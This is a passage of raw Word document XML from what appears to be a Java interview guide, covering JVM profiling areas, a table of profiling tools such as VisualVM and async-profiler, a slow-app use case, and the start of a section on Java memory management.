      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consuming the most CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361F076"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nalyze </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hotspots</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52C9A3"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Garbage Collection (GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E6C32"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ack how often GC occurs and how much time it takes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259AF48"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une JVM GC settings based on profiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A60CF6"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 Activity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C0EDE"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nitor thread states (running, waiting, blocked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E3086F"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Detect </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deadlocks</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thread contention</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race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC73D21"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lass Loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C80D44F"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nalyze which classes are loaded/unloaded and their memory footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DB2D0" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A794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3142B4F">
          <v:rect id="_x0000_i1255" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1C6C8" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">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Common JVM Profiling Too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9"/>
        <w:gridCol w:w="5968"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="3344DFE0" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0753ABBE" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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ool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF05DA2" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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6A794A" w:rsidRPr="00CE4B95" w14:paraId="65EE09A5" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744D6DE9"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VisualVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="597E862B"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undled with JDK; visual profiler for memory, CPU, GC, threads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="2B5CF6C7" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77F4D99A"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Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074CE0E9"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ghtweight monitoring tool; good for basic profiling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="79DCB655" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2874099C"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YourKit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06A16CEF"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mercial, advanced features for memory, threads, GC analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="128D5A03" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234BCCD9"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Profiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DFE5EF3"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mercial, very powerful for CPU/memory/thread profiling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="477A6297" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53C2CE60"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light Recorder &amp; Mission Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737415EF"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uilt into Oracle JDK; low-overhead continuous profiling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="7B49CDDB" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2522EE"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sync Profiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54B9E9C3"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pen-source, low-overhead async CPU and memory profiler.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A794A" w:rsidRPr="00CE4B95" w14:paraId="32CA3DC3" w14:textId="77777777" w:rsidTr="00A8451E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="596B399A"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erf (Linux)</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java Flame Graphs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="018DAA48" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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dvanced profiling using Linux performance tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13B01EC3" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006A794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7CE371D">
          <v:rect id="_x0000_i1256" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698D14D" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA270D9" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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notice your Java app is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slowing down</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFE5FC" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attach to the running JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6D461" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE734A" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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eap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> constantly growing → Possible </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory leak</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0799C703" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ertain method taking 80% of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Optimize that logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31746B7F" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between two threads → Fix synchronization issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E014394" w14:textId="406EC69A" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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How to Start JVM Profiling (Example with JVisualVM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A5B03" w14:textId="39DF3FB2" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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rt your Java application with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00610270" w14:textId="149194D7" w:rsidR="00120579" w:rsidRPr="00CE4B95" w:rsidRDefault="00120579" w:rsidP="006A79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478184372"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java -jar myapp.jar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0ECFCD" w14:textId="77777777" w:rsidR="00431D58" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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pen jvisualvm (comes with JDK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F46E785" w14:textId="77777777" w:rsidR="00431D58" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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ttach to the running process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCADB6" w14:textId="77777777" w:rsidR="00431D58" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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View tabs for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU</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Memory</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Threads</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GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B58CF" w14:textId="7772A3A3" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap dump</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profiling snapshots</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for deep analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AF59C" w14:textId="08C3DCFB" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058D378B" w14:textId="77777777" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B1434" w14:textId="77777777" w:rsidR="006A14CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ptimizes performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64744425" w14:textId="77777777" w:rsidR="006A14CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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roves resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFD107" w14:textId="77777777" w:rsidR="006A14CD" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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tects memory leaks early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16270318" w14:textId="176D49AB" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A8451E" w:rsidP="006A794A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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lps fix concurrency issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44026CEE" w14:textId="3A7699FD" w:rsidR="00A8451E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A8451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590F4929">
          <v:rect id="_x0000_i1257" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18274FA9" w14:textId="77777777" w:rsidR="004043D8" w:rsidRPr="00CE4B95" w:rsidRDefault="004043D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc196307576"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java memory management?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="78EF5690" w14:textId="6243D5B7" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">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Java memory management is how the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Virtual Machine (JVM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allocates, manages, and reclaims memory. It helps ensure your application runs efficiently and doesn't crash due to memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8DCEF" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A71AB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EFBE65">
          <v:rect id="_x0000_i1258" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA071CC" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">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Memory Areas in JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A890F" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB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Heap Memory (Runtime data area)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8D824" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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to allocate memory for objects and class instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078D929" w14:textId="77777777" w:rsidR="00D56C99" w:rsidRPr="00CE4B95" w:rsidRDefault="00D56C99" w:rsidP="00A71AB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Managed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Garbage Collector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
